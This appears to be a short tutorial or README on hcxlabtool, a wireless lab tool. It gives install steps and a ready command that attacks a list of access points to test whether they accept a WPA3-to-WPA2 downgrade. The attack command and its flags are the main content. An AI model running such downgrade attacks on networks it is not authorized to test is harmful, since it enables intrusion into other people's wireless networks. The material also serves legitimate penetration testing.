# hcxlabtool

This is an awesome tool for doing WPA3 downgrade attacks! Booyah!

Referenced from: this GitHub discusson

# Install pre-reqs and compile

git clone https://github.com/ZerBea/wifi_laboratory.git ~/wifilab
cd ~/wifilab
sudo apt install build-essential git libpcap-dev -y
make

# Attack a list of APs to see if they're vulnerable to a WPA3>WPA2 downgrade attack

sudo ./hcxlabtool p phy0 s 15 e ../wifi_laboratory-main/ap.list f 23b

Where:

  • p phy0 is the name of the physical interface
  • s 15 is the stay time in seconds`
  • e ap.list is the list of AP names to attack
  • f 23b is the channel and band to attack

# Additional resources

More information about this attack here. We also did a YouTube video on this downgrade attack here.